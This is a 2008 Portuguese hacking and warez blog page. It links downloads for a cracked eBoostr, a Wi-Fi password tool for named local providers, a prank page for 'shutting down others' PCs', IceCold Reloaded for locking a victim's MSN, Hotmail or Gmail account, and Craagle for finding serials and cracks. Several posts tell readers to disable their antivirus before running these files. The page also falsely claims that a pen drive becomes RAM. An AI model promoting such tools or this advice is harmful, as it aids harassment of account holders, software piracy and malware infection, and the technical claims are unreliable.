quarta-feira, 5 de novembro de 2008

Pessoal que visita este humilde blog, muito obrigado

programação AQUI É COISA SÉRIA!

Conhecimento não é crime - Não Me Responsabiliso Pelo Uso Mau Intencionado De Nada Postado
morinha junior

Ebooster - Use o Pen Drive como Memória RAM


eBoostr é um aplicativo que permite a utilização de um drive adicional (memória Flash ou HD) como uma camada adicional de otimização de performance do cache para o Windows XP, 2000 ou 2003. Não é mais necessário comprar a atualização para o Microsoft Windows Vista para desfrutar dos benefícios da tecnologia Vista ReadyBoost. Com eBoostr, o tempo de carregamento de seu sistema operacional, bem como dos aplicativos, é muto mais rápido, graças ao mecanismo de cacheamento inteligente.* Sem custo de atualização de hardwareeBoostr oferece uma solução simples e relativamente barata para o problema de insuficiência de RAM, pois você não precisará adquirir pentes adicionais de memória.* Extremamente fácilTudo o que você precisa para otimizar a performance é plugar um pen drive (ou qualquer outro dispositivo que utilize memória Flash), seleciona-lo como o dispositivo para dar mais velocidade ao seu computador e configurar a quantidade de espaço de memória a ser utilizado.Resumindo Galera… Se voce tem um Pen Drive de 1 ou 2 gb voce coloca ele e Abililita o Ready Ebooster … e seleciona quanto vai por… quanto + , mais performance na maquina… Resumindo … se voce tem 2 gb de ram … colocou uma Pen de 1gb tua maquina fica como se tivesse com 3 gb de memória e assim por diante…ele Transforma o Espaço da Pen Drive em MEMORIA RAM!eh Impressionante… eu Fiz o Teste e eh Realmente IMPRESSIONANTE…Para Instalar:Instalar o programa Reiniciar a Maquina e Depois dar Dois Cliques no EBctrSvc e o outro EboosterCP eh o que voce seleciona o quao quer colocar de memoria…» InformaçõesTamanho: 1MbFormato: RarFacilidade de Uso: 10Interface Gráfica: 10Número de Mídias: 1Idioma: ENTutorial , Serial , Crack baixa aqui http://rapidshare.com/files/85066420/Ebooster.willianwojcik.www.therebels.com.br.rar.html

SENHA DE WIRELESS


E SIMPLES O PROGRAMA TENHO ELE AQUI NO MEU PC ME ADD NO MSN

QUE EU PASSO ELE ... ESSA SENHA DA UAI MAX SÃO JOÃO,E GUIMARANIA

Desligar O PC Dos Outros depois bloquea a conta do msn

Desligar O PC Dos Outros ! ... Se desligar seu computador, é porque ficou bom. ... Envie Este Site Para Seu Amigo ! ! !para msn e orkut www.hunger.hu/win.html

IceCold ReloadedCom o IceCold Reloaded você poderá bloquear a conta de MSN de algum infeliz que resolveu cruzar seu camominho, legal não? Como Utilizar: Basta inserir o msn da vítima e clicar em Freeze Account!Obs: Para Desfreezar ( desbloquear ) a account da vítima é só clicar em DeFreeze Account!, e também uma última coisinha, a account somente ficará freezada enquanto o programa estiver aberto, ou seja, caso você feche o programa a account da vítima estará ''livre'' ( Desbloqueada ).O Programa funciona com os seguintes domínios- @hotmail- @gmail- @msnObservação Importantíssima: Você só poderá Freezar o msn de alguém quando o mesmo se encontrar OFFLINE, ou seja, caso o indivíduo esteja ONLINE não tente Freezar pois não funcionará ! desative seu antivirus primeiro,antes usar o programaLink para Download:http://w15.easy-share.com/1699510620.html depois vou posta como trava no servidor



IceCold Reloaded



Craagle, o filho hacker do Google


Quem nunca procurou na web o serial ou o crack de algum software pago, atire a primeira pedra! Como bons samaritanos, sabemos que isso é errado, mas quem hoje em dia é bobo o suficiente para ficar dando dinheiro pra essas companhias já multi-milionárias e toda essa máfia do software proprietário? (Tio Bill & Cia.)
Como entusiasta do software livre, recomendo o uso de algum programa gratuito, antes de partir para o crack de um software pago, mas caso não seja possível, conheça o Craagle, filho hacker do Google:
O Craagle é um software que possui como principal funcionalidade, pesquisar por seriais e cracks de programas pagos, além de buscar capas de cds de música.
Ele se conecta a diversos sites de busca hackers e encontra tudo que o usuário procura de forma limpa e organizada, somente sendo necessário digitar o nome do software a ser crackeado, sem o risco de contrair os vírus que normalmente infestam estes sites e ver aquele monte de pop-ups pornográficos que costumam aparecer quando se está navegando neles.
Já utilizo o Craagle há tempos e ele sempre encontrou e em grandes quantidades, todos os seriais e cracks que eu já precisei.
Para fazer o download da última versão 1.91 via Rapidshare, clique aqui.
obs pausa o antiviros